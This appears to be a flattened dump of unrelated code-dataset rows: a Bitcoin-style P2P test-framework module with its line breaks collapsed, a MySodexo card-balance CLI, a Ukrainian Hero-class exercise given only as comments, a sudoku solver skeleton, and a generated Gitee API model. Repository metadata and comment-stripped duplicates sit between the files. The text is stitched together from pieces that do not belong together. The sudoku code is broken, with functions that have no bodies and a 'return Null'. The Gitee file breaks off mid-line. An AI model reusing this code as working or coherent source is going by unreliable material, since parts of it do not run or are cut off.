import asyncore from collections import defaultdict from io import BytesIO import logging import socket import struct import sys import threading from test_framework.messages import * from test_framework.util import wait_until logger = logging.getLogger("TestFramework.mininode") MESSAGEMAP = { b"addr": msg_addr, b"block": msg_block, b"blocktxn": msg_blocktxn, b"cmpctblock": msg_cmpctblock, b"feefilter": msg_feefilter, b"getaddr": msg_getaddr, b"getblocks": msg_getblocks, b"getblocktxn": msg_getblocktxn, b"getdata": msg_getdata, b"getheaders": msg_getheaders, b"headers": msg_headers, b"inv": msg_inv, b"mempool": msg_mempool, b"ping": msg_ping, b"pong": msg_pong, b"reject": msg_reject, b"sendcmpct": msg_sendcmpct, b"sendheaders": msg_sendheaders, b"tx": msg_tx, b"verack": msg_verack, b"version": msg_version, } MAGIC_BYTES = { "mainnet": b"\xfb\xc0\xb6\xdb", "testnet4": b"\xfd\xd2\xc8\xf1", "regtest": b"\xfa\xbf\xb5\xda", } class P2PConnection(asyncore.dispatcher): def __init__(self): assert not network_thread_running() super().__init__(map=mininode_socket_map) def peer_connect(self, dstaddr, dstport, net="regtest"): self.dstaddr = dstaddr self.dstport = dstport self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) self.sendbuf = b"" self.recvbuf = b"" self.state = "connecting" self.network = net self.disconnect = False logger.info('Connecting to Actinium Node: %s:%d' % (self.dstaddr, self.dstport)) try: self.connect((dstaddr, dstport)) except: self.handle_close() def peer_disconnect(self): if self.state == "connected": self.disconnect_node() def handle_connect(self): if self.state != "connected": logger.debug("Connected & Listening: %s:%d" % (self.dstaddr, self.dstport)) self.state = "connected" self.on_open() def handle_close(self): logger.debug("Closing connection to: %s:%d" % (self.dstaddr, self.dstport)) self.state = "closed" self.recvbuf = b"" self.sendbuf = b"" try: self.close() except: pass self.on_close() def disconnect_node(self): self.disconnect = True def handle_read(self): t = self.recv(8192) if len(t) > 0: self.recvbuf += t self._on_data() def _on_data(self): try: while True: if len(self.recvbuf) < 4: return if self.recvbuf[:4] != MAGIC_BYTES[self.network]: raise ValueError("got garbage %s" % repr(self.recvbuf)) if len(self.recvbuf) < 4 + 12 + 4 + 4: return command = self.recvbuf[4:4+12].split(b"\x00", 1)[0] msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0] checksum = self.recvbuf[4+12+4:4+12+4+4] if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen: return msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen] th = sha256(msg) h = sha256(th) if checksum != h[:4]: raise ValueError("got bad checksum " + repr(self.recvbuf)) self.recvbuf = self.recvbuf[4+12+4+4+msglen:] if command not in MESSAGEMAP: raise ValueError("Received unknown command from %s:%d: '%s' %s" % (self.dstaddr, self.dstport, command, repr(msg))) f = BytesIO(msg) t = MESSAGEMAP[command]() t.deserialize(f) self._log_message("receive", t) self.on_message(t) except Exception as e: logger.exception('Error reading message:', repr(e)) raise def on_message(self, message): raise NotImplementedError def writable(self): with mininode_lock: pre_connection = self.state == "connecting" length = len(self.sendbuf) return (length > 0 or pre_connection) def handle_write(self): with mininode_lock: if self.state == "connecting": self.handle_connect() if not self.writable(): return try: sent = self.send(self.sendbuf) except: self.handle_close() return self.sendbuf = self.sendbuf[sent:] def send_message(self, message, pushbuf=False): if self.state != "connected" and not pushbuf: raise IOError('Not connected, no pushbuf') self._log_message("send", message) command = message.command data = message.serialize() tmsg = MAGIC_BYTES[self.network] tmsg += command tmsg += b"\x00" * (12 - len(command)) tmsg += struct.pack("<I", len(data)) th = sha256(data) h = sha256(th) tmsg += h[:4] tmsg += data with mininode_lock: if (len(self.sendbuf) == 0 and not pushbuf): try: sent = self.send(tmsg) self.sendbuf = tmsg[sent:] except BlockingIOError: self.sendbuf = tmsg else: self.sendbuf += tmsg def _log_message(self, direction, msg): if direction == "send": log_message = "Send message to " elif direction == "receive": log_message = "Received message from " log_message += "%s:%d: %s" % (self.dstaddr, self.dstport, repr(msg)[:500]) if len(log_message) > 500: log_message += "... (msg truncated)" logger.debug(log_message) class P2PInterface(P2PConnection): def __init__(self): super().__init__() self.message_count = defaultdict(int) self.last_message = {} self.ping_counter = 1 # The network services received from the peer self.nServices = 0 def peer_connect(self, *args, services=NODE_NETWORK|NODE_WITNESS, send_version=True, **kwargs): super().peer_connect(*args, **kwargs) if send_version: # Send a version msg vt = msg_version() vt.nServices = services vt.addrTo.ip = self.dstaddr vt.addrTo.port = self.dstport vt.addrFrom.ip = "0.0.0.0" vt.addrFrom.port = 0 self.send_message(vt, True) # Message receiving methods def on_message(self, message): with mininode_lock: try: command = message.command.decode('ascii') self.message_count[command] += 1 self.last_message[command] = message getattr(self, 'on_' + command)(message) except: print("ERROR delivering %s (%s)" % (repr(message), sys.exc_info()[0])) raise # Callback methods. Can be overridden by subclasses in individual test # cases to provide custom message handling behaviour. def on_open(self): pass def on_close(self): pass def on_addr(self, message): pass def on_block(self, message): pass def on_blocktxn(self, message): pass def on_cmpctblock(self, message): pass def on_feefilter(self, message): pass def on_getaddr(self, message): pass def on_getblocks(self, message): pass def on_getblocktxn(self, message): pass def on_getdata(self, message): pass def on_getheaders(self, message): pass def on_headers(self, message): pass def on_mempool(self, message): pass def on_pong(self, message): pass def on_reject(self, message): pass def on_sendcmpct(self, message): pass def on_sendheaders(self, message): pass def on_tx(self, message): pass def on_inv(self, message): want = msg_getdata() for i in message.inv: if i.type != 0: want.inv.append(i) if len(want.inv): self.send_message(want) def on_ping(self, message): self.send_message(msg_pong(message.nonce)) def on_verack(self, message): self.verack_received = True def on_version(self, message): assert message.nVersion >= MIN_VERSION_SUPPORTED, "Version {} received. Test framework only supports versions greater than {}".format(message.nVersion, MIN_VERSION_SUPPORTED) self.send_message(msg_verack()) self.nServices = message.nServices # Connection helper methods def wait_for_disconnect(self, timeout=60): test_function = lambda: self.state != "connected" wait_until(test_function, timeout=timeout, lock=mininode_lock) # Message receiving helper methods def wait_for_block(self, blockhash, timeout=60): test_function = lambda: self.last_message.get("block") and self.last_message["block"].block.rehash() == blockhash wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_getdata(self, timeout=60): test_function = lambda: self.last_message.get("getdata") wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_getheaders(self, timeout=60): test_function = lambda: self.last_message.get("getheaders") wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_inv(self, expected_inv, timeout=60): if len(expected_inv) > 1: raise NotImplementedError("wait_for_inv() will only verify the first inv object") test_function = lambda: self.last_message.get("inv") and \ self.last_message["inv"].inv[0].type == expected_inv[0].type and \ self.last_message["inv"].inv[0].hash == expected_inv[0].hash wait_until(test_function, timeout=timeout, lock=mininode_lock) def wait_for_verack(self, timeout=60): test_function = lambda: self.message_count["verack"] wait_until(test_function, timeout=timeout, lock=mininode_lock) # Message sending helper functions def send_and_ping(self, message): self.send_message(message) self.sync_with_ping() # Sync up with the node def sync_with_ping(self, timeout=60): self.send_message(msg_ping(nonce=self.ping_counter)) test_function = lambda: self.last_message.get("pong") and self.last_message["pong"].nonce == self.ping_counter wait_until(test_function, timeout=timeout, lock=mininode_lock) self.ping_counter += 1 # Keep our own socket map for asyncore, so that we can track disconnects # ourselves (to workaround an issue with closing an asyncore socket when # using select) mininode_socket_map = dict() # One lock for synchronizing all data access between the networking thread (see # NetworkThread below) and the thread running the test logic. For simplicity, # P2PConnection acquires this lock whenever delivering a message to a P2PInterface, # and whenever adding anything to the send buffer (in send_message()). This # lock should be acquired in the thread running the test logic to synchronize # access to any data shared with the P2PInterface or P2PConnection. mininode_lock = threading.RLock() class NetworkThread(threading.Thread): def __init__(self): super().__init__(name="NetworkThread") def run(self): while mininode_socket_map: # We check for whether to disconnect outside of the asyncore # loop to workaround the behavior of asyncore when using # select disconnected = [] for fd, obj in mininode_socket_map.items(): if obj.disconnect: disconnected.append(obj) [obj.handle_close() for obj in disconnected] asyncore.loop(0.1, use_poll=True, map=mininode_socket_map, count=1) logger.debug("Network thread closing") def network_thread_start(): # Only one network thread may run at a time assert not network_thread_running() NetworkThread().start() def network_thread_running(): return any([thread.name == "NetworkThread" for thread in threading.enumerate()]) def network_thread_join(timeout=10): network_threads = [thread for thread in threading.enumerate() if thread.name == "NetworkThread"] assert len(network_threads) <= 1 for thread in network_threads: thread.join(timeout) assert not thread.is_alive()
true
true
f705e7e9ad7e6291fc8bcef3839455d8f43946dd
3,324
py
Python
mysodexo/cli.py
AndreMiras/mysodexo
3d0836c38e10d579a8758b998744d1a38ff77260
[ "MIT" ]
9
2019-11-13T08:15:51.000Z
2022-03-07T18:48:28.000Z
mysodexo/cli.py
AndreMiras/mysodexo
3d0836c38e10d579a8758b998744d1a38ff77260
[ "MIT" ]
3
2019-11-13T16:45:33.000Z
2021-10-21T10:47:54.000Z
mysodexo/cli.py
AndreMiras/mysodexo
3d0836c38e10d579a8758b998744d1a38ff77260
[ "MIT" ]
1
2020-10-10T10:22:37.000Z
2020-10-10T10:22:37.000Z
#!/usr/bin/env python3 import argparse import os import pickle from getpass import getpass from typing import Tuple import requests from appdirs import user_cache_dir from mysodexo import api from mysodexo.constants import APPLICATION_NAME, SESSION_CACHE_FILENAME def prompt_login() -> Tuple[str, str]: """Prompts user for credentials and the returns them as a tuple.""" email = input("email: ") password = getpass("password: ") return (email, password) def get_session_cache_path() -> str: return os.path.join( user_cache_dir(appname=APPLICATION_NAME), SESSION_CACHE_FILENAME ) def get_cached_session_info() -> Tuple[ requests.cookies.RequestsCookieJar, str ]: """Returns session and DNI from cache.""" session_cache_path = get_session_cache_path() with open(session_cache_path, "rb") as f: cached_session_info = pickle.load(f) cookies = cached_session_info["cookies"] dni = cached_session_info["dni"] return (cookies, dni) def cache_session_info( cookies: requests.cookies.RequestsCookieJar, dni: str ) -> None: """Stores session info to cache.""" session_cache_path = get_session_cache_path() cached_session_info = { "cookies": cookies, "dni": dni, } os.makedirs(os.path.dirname(session_cache_path), exist_ok=True) with open(session_cache_path, "wb") as f: pickle.dump(cached_session_info, f) def login() -> Tuple[requests.sessions.Session, str]: """Logins and returns session info.""" email, password = prompt_login() session, account_info = api.login(email, password) dni = account_info["dni"] return (session, dni) def process_login() -> Tuple[requests.sessions.Session, str]: """Logins and stores session info to cache.""" session, dni = login() cache_session_info(session.cookies, dni) return (session, dni) def get_session_or_login() -> Tuple[requests.sessions.Session, str]: """Retrieves session from cache or prompts login then stores session.""" try: cookies, dni = get_cached_session_info() session = requests.session() session.cookies.update(cookies) except FileNotFoundError: session, dni = process_login() return session, dni def print_balance(cards): """Prints per card balance.""" for card in cards: pan = card["pan"] details = card["_details"] balance = details["cardBalance"] print(f"{pan}: {balance}") def process_balance(): session, dni = get_session_or_login() cards = api.get_cards(session, dni) for card in cards: card_number = card["cardNumber"] details = api.get_detail_card(session, card_number) card["_details"] = details print_balance(cards) def main(): parser = argparse.ArgumentParser( description="MySodexo Command Line Interface" ) parser.add_argument( "--login", action="store_true", help="Logins and store session.", ) parser.add_argument( "--balance", action="store_true", help="Returns account balance per card", ) args = parser.parse_args() if args.login: process_login() elif args.balance: process_balance() else: parser.print_help() if __name__ == "__main__": main()
27.245902
76
0.671781
import argparse import os import pickle from getpass import getpass from typing import Tuple import requests from appdirs import user_cache_dir from mysodexo import api from mysodexo.constants import APPLICATION_NAME, SESSION_CACHE_FILENAME def prompt_login() -> Tuple[str, str]: email = input("email: ") password = getpass("password: ") return (email, password) def get_session_cache_path() -> str: return os.path.join( user_cache_dir(appname=APPLICATION_NAME), SESSION_CACHE_FILENAME ) def get_cached_session_info() -> Tuple[ requests.cookies.RequestsCookieJar, str ]: session_cache_path = get_session_cache_path() with open(session_cache_path, "rb") as f: cached_session_info = pickle.load(f) cookies = cached_session_info["cookies"] dni = cached_session_info["dni"] return (cookies, dni) def cache_session_info( cookies: requests.cookies.RequestsCookieJar, dni: str ) -> None: session_cache_path = get_session_cache_path() cached_session_info = { "cookies": cookies, "dni": dni, } os.makedirs(os.path.dirname(session_cache_path), exist_ok=True) with open(session_cache_path, "wb") as f: pickle.dump(cached_session_info, f) def login() -> Tuple[requests.sessions.Session, str]: email, password = prompt_login() session, account_info = api.login(email, password) dni = account_info["dni"] return (session, dni) def process_login() -> Tuple[requests.sessions.Session, str]: session, dni = login() cache_session_info(session.cookies, dni) return (session, dni) def get_session_or_login() -> Tuple[requests.sessions.Session, str]: try: cookies, dni = get_cached_session_info() session = requests.session() session.cookies.update(cookies) except FileNotFoundError: session, dni = process_login() return session, dni def print_balance(cards): for card in cards: pan = card["pan"] details = card["_details"] balance = details["cardBalance"] print(f"{pan}: {balance}") def process_balance(): session, dni = get_session_or_login() cards = api.get_cards(session, dni) for card in cards: card_number = card["cardNumber"] details = api.get_detail_card(session, card_number) card["_details"] = details print_balance(cards) def main(): parser = argparse.ArgumentParser( description="MySodexo Command Line Interface" ) parser.add_argument( "--login", action="store_true", help="Logins and store session.", ) parser.add_argument( "--balance", action="store_true", help="Returns account balance per card", ) args = parser.parse_args() if args.login: process_login() elif args.balance: process_balance() else: parser.print_help() if __name__ == "__main__": main()
true
true
f705e87ae9a2d445b3fb793b75ab4fa77992ea13
755
py
Python
DZ16_04/less11_5.py
denyskovalev/hillel_school_python
df75b3d6779fd03bc94278d27508cc3e461ab421
[ "MIT" ]
null
null
null
DZ16_04/less11_5.py
denyskovalev/hillel_school_python
df75b3d6779fd03bc94278d27508cc3e461ab421
[ "MIT" ]
null
null
null
DZ16_04/less11_5.py
denyskovalev/hillel_school_python
df75b3d6779fd03bc94278d27508cc3e461ab421
[ "MIT" ]
null
null
null
# Реалізувати клас Герой що має мати наступні атрибути: ім‘я, здоров‘я, ранг, сила і метод вдарити. # Метод вдарити повинен наносити шкоду противнику в розмірі сили героя. Герой має мати наступні # обмеження: здоров‘я від 0 до 100, ранг 1,2,3. Сила не більше 10% теперішнього здоров‘я героя. # Не можна бити героїв здоров‘я яких менше 5. # # Реалізувати клас маг, який може відновлювати здоров'я інших героїв, також він має ранг як герой і # може наносити удари. За відновлення здоров'я він бере гроші. ( Вам потрібно реалізувати цей функціонал ). # Герой заробляє гроші за перемогу у бою з іншим героєм, також при перемозі він забирає всі гроші суперника. # Скільки герой отримує грошей за перемогу і скільки коштує відновити здоров'я, на ваш розсуд)
58.076923
108
0.774834
# може наносити удари. За відновлення здоров'я він бере гроші. ( Вам потрібно реалізувати цей функціонал ).
true
true
f705e88b99176b040f97721c78c6232811d99bc9
2,592
py
Python
sudoku skeleton,blocks and solution/sudoku_skeleton.py
AvantG/robotics
f97e2ab6a52aad901d968b960c25e91556bdcc86
[ "MIT" ]
null
null
null
sudoku skeleton,blocks and solution/sudoku_skeleton.py
AvantG/robotics
f97e2ab6a52aad901d968b960c25e91556bdcc86
[ "MIT" ]
null
null
null
sudoku skeleton,blocks and solution/sudoku_skeleton.py
AvantG/robotics
f97e2ab6a52aad901d968b960c25e91556bdcc86
[ "MIT" ]
null
null
null
import copy ########################################### This function reads in block from file def grid_from_file(file_name): lst=[] f=open(file_name) for line in f: lst2=[] for i in line: if i == "x": lst2.append(i) elif i.isdigit(): lst2.append(int(i)) lst.append(lst2) return lst ################################################## def subgrid_values(grid, row, col): val = [] #get dimension of inner box n = int(len(grid)**(0.5)) #get starting row and starting col r = (row//n)*n c = (col//n)*n for i in range(r, r+n): for j in range(c, c+n): val.append(grid[i][j]) return val # This returns a list of values in the subgrid def column_values(grid,col): val=[] n=len(grid) for i in range(n): val.append(grid[i][col]) return val #This returns a list of values in the column def row_values(grid,row): val=[] n=len(grid) for i in range(n): val.append(grid[row][i]) return val #This returns a list of values in the row ################################################# def valid_entry(grid,num,r,c): check1=num not in column_values(grid,c) check2=num not in row_values(grid,r) check3=num not in subgrid_values(grid,r,c) if check1 and check2 and check3: return True return False ################################################### def grids_augmented_in_row(grid,num,r): #Write code here #################################################### This should recursively use the function above to def grids_augmented_with_number(grid,num): #Write code here #################################################### This should recursively use the function above to complete the sudoku puzzle. def solve_sudoku(file_name): #Write code here #################################################### this makes a function that chooses sudoku block based of numbers def block_selector(number): if number==1: return "gridA.txt" elif number==2: return "gridB.txt" elif number==3: return "gridC.txt" elif number==4: return "gridD.txt" elif number==5: return "gridE.txt" elif number==6: return "gridF.txt" else: return Null #################################################### this solves the block, change number variable to swap blocks number=6 print(solve_sudoku(block_selector(number)))
32.4
131
0.505787
import copy
false
true
f705e8be9f1c5b46fb2b7a7156603fafbace0312
14,306
py
Python
gitee/models/body19.py
pygitee/pygitee
7622314a4dbb08cf2f729b6cdd0a2887b96e394e
[ "MIT" ]
null
null
null
gitee/models/body19.py
pygitee/pygitee
7622314a4dbb08cf2f729b6cdd0a2887b96e394e
[ "MIT" ]
null
null
null
gitee/models/body19.py
pygitee/pygitee
7622314a4dbb08cf2f729b6cdd0a2887b96e394e
[ "MIT" ]
null
null
null
# coding: utf-8 import pprint import re # noqa: F401 import six class Body19(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'access_token': 'str', 'name': 'str', 'description': 'str', 'homepage': 'str', 'has_issues': 'bool', 'has_wiki': 'bool', 'can_comment': 'bool', 'issue_comment': 'bool', 'security_hole_enabled': 'bool', 'private': 'bool', 'path': 'str', 'default_branch': 'str', 'pull_requests_enabled': 'bool', 'online_edit_enabled': 'bool', 'lightweight_pr_enabled': 'bool' } attribute_map = { 'access_token': 'access_token', 'name': 'name', 'description': 'description', 'homepage': 'homepage', 'has_issues': 'has_issues', 'has_wiki': 'has_wiki', 'can_comment': 'can_comment', 'issue_comment': 'issue_comment', 'security_hole_enabled': 'security_hole_enabled', 'private': 'private', 'path': 'path', 'default_branch': 'default_branch', 'pull_requests_enabled': 'pull_requests_enabled', 'online_edit_enabled': 'online_edit_enabled', 'lightweight_pr_enabled': 'lightweight_pr_enabled' } def __init__(self, access_token=None, name=None, description=None, homepage=None, has_issues=True, has_wiki=True, can_comment=True, issue_comment=None, security_hole_enabled=None, private=None, path=None, default_branch=None, pull_requests_enabled=None, online_edit_enabled=None, lightweight_pr_enabled=None): # noqa: E501 """Body19 - a model defined in Swagger""" # noqa: E501 self._access_token = None self._name = None self._description = None self._homepage = None self._has_issues = None self._has_wiki = None self._can_comment = None self._issue_comment = None self._security_hole_enabled = None self._private = None self._path = None self._default_branch = None self._pull_requests_enabled = None self._online_edit_enabled = None self._lightweight_pr_enabled = None self.discriminator = None if access_token is not None: self.access_token = access_token self.name = name if description is not None: self.description = description if homepage is not None: self.homepage = homepage if has_issues is not None: self.has_issues = has_issues if has_wiki is not None: self.has_wiki = has_wiki if can_comment is not None: self.can_comment = can_comment if issue_comment is not None: self.issue_comment = issue_comment if security_hole_enabled is not None: self.security_hole_enabled = security_hole_enabled if private is not None: self.private = private if path is not None: self.path = path if default_branch is not None: self.default_branch = default_branch if pull_requests_enabled is not None: self.pull_requests_enabled = pull_requests_enabled if online_edit_enabled is not None: self.online_edit_enabled = online_edit_enabled if lightweight_pr_enabled is not None: self.lightweight_pr_enabled = lightweight_pr_enabled @property def access_token(self): """Gets the access_token of this Body19. # noqa: E501 用户授权码 # noqa: E501 :return: The access_token of this Body19. # noqa: E501 :rtype: str """ return self._access_token @access_token.setter def access_token(self, access_token): """Sets the access_token of this Body19. 用户授权码 # noqa: E501 :param access_token: The access_token of this Body19. # noqa: E501 :type: str """ self._access_token = access_token @property def name(self): """Gets the name of this Body19. # noqa: E501 仓库名称 # noqa: E501 :return: The name of this Body19. # noqa: E501 :rtype: str """ return self._name @name.setter def name(self, name): """Sets the name of this Body19. 仓库名称 # noqa: E501 :param name: The name of this Body19. # noqa: E501 :type: str """ if name is None: raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501 self._name = name @property def description(self): """Gets the description of this Body19. # noqa: E501 仓库描述 # noqa: E501 :return: The description of this Body19. # noqa: E501 :rtype: str """ return self._description @description.setter def description(self, description): """Sets the description of this Body19. 仓库描述 # noqa: E501 :param description: The description of this Body19. # noqa: E501 :type: str """ self._description = description @property def homepage(self): """Gets the homepage of this Body19. # noqa: E501 主页(eg: https://gitee.com) # noqa: E501 :return: The homepage of this Body19. # noqa: E501 :rtype: str """ return self._homepage @homepage.setter def homepage(self, homepage): """Sets the homepage of this Body19. 主页(eg: https://gitee.com) # noqa: E501 :param homepage: The homepage of this Body19. # noqa: E501 :type: str """ self._homepage = homepage @property def has_issues(self): """Gets the has_issues of this Body19. # noqa: E501 允许提Issue与否。默认: 允许(true) # noqa: E501 :return: The has_issues of this Body19. # noqa: E501 :rtype: bool """ return self._has_issues @has_issues.setter def has_issues(self, has_issues): """Sets the has_issues of this Body19. 允许提Issue与否。默认: 允许(true) # noqa: E501 :param has_issues: The has_issues of this Body19. # noqa: E501 :type: bool """ self._has_issues = has_issues @property def has_wiki(self): """Gets the has_wiki of this Body19. # noqa: E501 提供Wiki与否。默认: 提供(true) # noqa: E501 :return: The has_wiki of this Body19. # noqa: E501 :rtype: bool """ return self._has_wiki @has_wiki.setter def has_wiki(self, has_wiki): """Sets the has_wiki of this Body19. 提供Wiki与否。默认: 提供(true) # noqa: E501 :param has_wiki: The has_wiki of this Body19. # noqa: E501 :type: bool """ self._has_wiki = has_wiki @property def can_comment(self): """Gets the can_comment of this Body19. # noqa: E501 允许用户对仓库进行评论。默认: 允许(true) # noqa: E501 :return: The can_comment of this Body19. # noqa: E501 :rtype: bool """ return self._can_comment @can_comment.setter def can_comment(self, can_comment): """Sets the can_comment of this Body19. 允许用户对仓库进行评论。默认: 允许(true) # noqa: E501 :param can_comment: The can_comment of this Body19. # noqa: E501 :type: bool """ self._can_comment = can_comment @property def issue_comment(self): """Gets the issue_comment of this Body19. # noqa: E501 允许对“关闭”状态的 Issue 进行评论。默认: 不允许(false) # noqa: E501 :return: The issue_comment of this Body19. # noqa: E501 :rtype: bool """ return self._issue_comment @issue_comment.setter def issue_comment(self, issue_comment): """Sets the issue_comment of this Body19. 允许对“关闭”状态的 Issue 进行评论。默认: 不允许(false) # noqa: E501 :param issue_comment: The issue_comment of this Body19. # noqa: E501 :type: bool """ self._issue_comment = issue_comment @property def security_hole_enabled(self): """Gets the security_hole_enabled of this Body19. # noqa: E501 允许用户创建涉及敏感信息的 Issue。默认: 不允许(false) # noqa: E501 :return: The security_hole_enabled of this Body19. # noqa: E501 :rtype: bool """ return self._security_hole_enabled @security_hole_enabled.setter def security_hole_enabled(self, security_hole_enabled): """Sets the security_hole_enabled of this Body19. 允许用户创建涉及敏感信息的 Issue。默认: 不允许(false) # noqa: E501 :param security_hole_enabled: The security_hole_enabled of this Body19. # noqa: E501 :type: bool """ self._security_hole_enabled = security_hole_enabled @property def private(self): """Gets the private of this Body19. # noqa: E501 仓库公开或私有。 # noqa: E501 :return: The private of this Body19. # noqa: E501 :rtype: bool """ return self._private @private.setter def private(self, private): """Sets the private of this Body19. 仓库公开或私有。 # noqa: E501 :param private: The private of this Body19. # noqa: E501 :type: bool """ self._private = private @property def path(self): """Gets the path of this Body19. # noqa: E501 更新仓库路径 # noqa: E501 :return: The path of this Body19. # noqa: E501 :rtype: str """ return self._path @path.setter def path(self, path): """Sets the path of this Body19. 更新仓库路径 # noqa: E501 :param path: The path of this Body19. # noqa: E501 :type: str """ self._path = path @property def default_branch(self): """Gets the default_branch of this Body19. # noqa: E501 更新默认分支 # noqa: E501 :return: The default_branch of this Body19. # noqa: E501 :rtype: str """ return self._default_branch @default_branch.setter def default_branch(self, default_branch): """Sets the default_branch of this Body19. 更新默认分支 # noqa: E501 :param default_branch: The default_branch of this Body19. # noqa: E501 :type: str """ self._default_branch = default_branch @property def pull_requests_enabled(self): """Gets the pull_requests_enabled of this Body19. # noqa: E501 接受 pull request,协作开发 # noqa: E501 :return: The pull_requests_enabled of this Body19. # noqa: E501 :rtype: bool """ return self._pull_requests_enabled @pull_requests_enabled.setter def pull_requests_enabled(self, pull_requests_enabled): """Sets the pull_requests_enabled of this Body19. 接受 pull request,协作开发 # noqa: E501 :param pull_requests_enabled: The pull_requests_enabled of this Body19. # noqa: E501 :type: bool """ self._pull_requests_enabled = pull_requests_enabled @property def online_edit_enabled(self): """Gets the online_edit_enabled of this Body19. # noqa: E501 是否允许仓库文件在线编辑 # noqa: E501 :return: The online_edit_enabled of this Body19. # noqa: E501 :rtype: bool """ return self._online_edit_enabled @online_edit_enabled.setter def online_edit_enabled(self, online_edit_enabled): """Sets the online_edit_enabled of this Body19. 是否允许仓库文件在线编辑 # noqa: E501 :param online_edit_enabled: The online_edit_enabled of this Body19. # noqa: E501 :type: bool """ self._online_edit_enabled = online_edit_enabled @property def lightweight_pr_enabled(self): """Gets the lightweight_pr_enabled of this Body19. # noqa: E501 是否接受轻量级 pull request # noqa: E501 :return: The lightweight_pr_enabled of this Body19. # noqa: E501 :rtype: bool """ return self._lightweight_pr_enabled @lightweight_pr_enabled.setter def lightweight_pr_enabled(self, lightweight_pr_enabled): """Sets the lightweight_pr_enabled of this Body19. 是否接受轻量级 pull request # noqa: E501 :param lightweight_pr_enabled: The lightweight_pr_enabled of this Body19. # noqa: E501 :type: bool """ self._lightweight_pr_enabled = lightweight_pr_enabled def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(Body19, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, Body19): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
28.55489
117
0.592199
import pprint import re import six class Body19(object): swagger_types = { 'access_token': 'str', 'name': 'str', 'description': 'str', 'homepage': 'str', 'has_issues': 'bool', 'has_wiki': 'bool', 'can_comment': 'bool', 'issue_comment': 'bool', 'security_hole_enabled': 'bool', 'private': 'bool', 'path': 'str', 'default_branch': 'str', 'pull_requests_enabled': 'bool', 'online_edit_enabled': 'bool', 'lightweight_pr_enabled': 'bool' } attribute_map = { 'access_token': 'access_token', 'name': 'name', 'description': 'description', 'homepage': 'homepage', 'has_issues': 'has_issues', 'has_wiki': 'has_wiki', 'can_comment': 'can_comment', 'issue_comment': 'issue_comment', 'security_hole_enabled': 'security_hole_enabled', 'private': 'private', 'path': 'path', 'default_branch': 'default_branch', 'pull_requests_enabled': 'pull_requests_enabled', 'online_edit_enabled': 'online_edit_enabled', 'lightweight_pr_enabled': 'lightweight_pr_enabled' } def __init__(self, access_token=None, name=None, description=None, homepage=None, has_issues=True, has_wiki=True, can_comment=True, issue_comment=None, security_hole_enabled=None, private=None, path=None, default_branch=None, pull_requests_enabled=None, online_edit_enabled=None, lightweight_pr_enabled=None): self._access_token = None self._name = None self._description = None self._homepage = None self._has_issues = None self._has_wiki = None self._can_comment = None self._issue_comment = None self._security_hole_enabled = None self._private = None self._path = None self._default_branch = None self._pull_requests_enabled = None self._online_edit_enabled = None self._lightweight_pr_enabled = None self.discriminator = None if access_token is not None: self.access_token = access_token self.name = name if description is not None: self.description = description if homepage is not None: self.homepage = homepage if has_issues is not None: self.has_issues = has_issues if has_wiki is not None: self.has_wiki = has_wiki if can_comment is not None: self.can_comment = can_comment if issue_comment is not None: self.issue_comment = issue_comment if security_hole_enabled is not None: self.security_hole_enabled = security_hole_enabled if private is not None: self.private = private if path is not None: self.path = path if default_branch is not None: self.default_branch = default_branch if pull_requests_enabled is not None: self.pull_requests_enabled = pull_requests_enabled if online_edit_enabled is not None: self.online_edit_enabled = online_edit_enabled if lightweight_pr_enabled is not None: self.lightweight_pr_enabled = lightweight_pr_enabled @property def access_token(self): return self._access_token @access_token.setter def access_token(self, access_token): self._access_token = access_token @property def name(self): return self._name @name.setter def name(self, name): if name is None: raise ValueError("Invalid value for `name`, must not be `None`") self._name = name @property def description(self): return self._description @description.setter def description(self, description): self._description = description @property def homepage(self): return self._homepage @homepage.setter def homepage(self, homepage): self._homepage = homepage @property def has_issues(self): return self._has_issues @has_issues.setter def has_issues(self, has_issues): self._has_issues = has_issues @property def has_wiki(self): return self._has_wiki @has_wiki.setter def has_wiki(self, has_wiki): self._has_wiki = has_wiki @property def can_comment(self): return self._can_comment @can_comment.setter def can_comment(self, can_comment): self._can_comment = can_comment @property def issue_comment(self): return self._issue_comment @issue_comment.setter def issue_comment(self, issue_comment): self._issue_comment = issue_comment @property def security_hole_enabled(self): return self._security_hole_enabled @security_hole_enabled.setter def security_hole_enabled(self, security_hole_enabled): self._security_hole_enabled = security_hole_enabled @property def private(self): return self._private @private.setter def private(self, private): self._private = private @property def path(self): return self._path @path.setter def path(self, path): self._path = path @property def default_branch(self): return self._default_branch @default_branch.setter def default_branch(self, default_branch): self._default_branch = default_branch @property def pull_requests_enabled(self): return self._pull_requests_enabled @pull_requests_enabled.setter def pull_requests_enabled(self, pull_requests_enabled): self._pull_requests_enabled = pull_requests_enabled @property def online_edit_enabled(self): return self._online_edit_enabled @online_edit_enabled.setter def online_edit_enabled(self, online_edit_enabled): self._online_edit_enabled = online_edit_enabled @property def lightweight_pr_enabled(self): return self._lightweight_pr_enabled @lightweight_pr_enabled.setter def lightweight_pr_enabled(self, lightweight_pr_enabled): self._lightweight_pr_enabled = lightweight_pr_enabled def to_dict(self): result = {} for attr, _ in 